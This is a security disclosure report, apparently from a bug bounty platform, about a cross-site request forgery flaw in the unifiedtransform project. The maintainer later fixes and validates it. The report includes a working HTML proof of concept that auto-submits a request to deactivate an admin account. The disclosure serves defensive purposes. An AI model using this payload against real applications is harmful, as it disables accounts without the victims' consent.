Cross-Site Request Forgery (CSRF) in changeweb/unifiedtransform

Valid

Reported on

Jul 26th 2021


✍️ Description

When you don't set the SameSite attribute of cookies the browsers have special act in front of this issue.(I mean set default value on it) chrome and chromium based browsers set the attribute "Lax" that mean if you do add/delete/alter operation in a get HTTP request then your site more vulnerable with CSRF attacks. But Firefox ( one of big ones ) don't set this attribute to "Lax" and set it to "none" that makes all POST and GET requests more Vulnerable to CSRF attack.

Unifiedtransform set SameSite attribute to nothings, then If don't set any CSRF protection in Requests then your site vulnerable to POST and Get requests in Chrome and Firefox and Get requests in Chrome.

Your application in following endpoint have not any CSRF protection: http://localhost:8000/master/deactivate-admin/{id}

First of all, you should run this Html payload and then you should see that the admins with 262 Id are deactivated now.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
      <form action="http://192.168.1.23:8000/master/deactivate-admin/262">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of deactivated all users.

Occurences

amammad modified their report
4 months ago
amammad
4 months ago

Researcher


Hey @admin can you contact with unifiedtransform team?

Jamie Slome
4 months ago

Admin


@amammad, we are currently waiting for the maintainer to create a SECURITY.md, so that we can send the report to them.

amammad
4 months ago

Researcher


@admin ok thanks dear jamie.

We have contacted a member of the changeweb/unifiedtransform team and are waiting to hear back 4 months ago
amammad modified their report
4 months ago
amammad
4 months ago

Researcher


@admin hey admin

can you send contacting email again for this and other reports?

the contact email was wrong and now have been corrected.

Hasib Mahmud
4 months ago

Maintainer


@amammad I have pushed a PR regarding the fix on this issue. Please check and let me know if it is working. Thank you.

Hasib Mahmud
4 months ago

Maintainer


Check the recent commit regarding this issue.

amammad
3 months ago

Researcher


Hey man, I hope this report help you to fix vulnerabilities.

i just want to aure that you didnt miss this report.

Hasib Mahmud validated this vulnerability 3 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Hasib Mahmud confirmed that a fix has been merged on a6497a 3 months ago
Hasib Mahmud has been awarded the fix bounty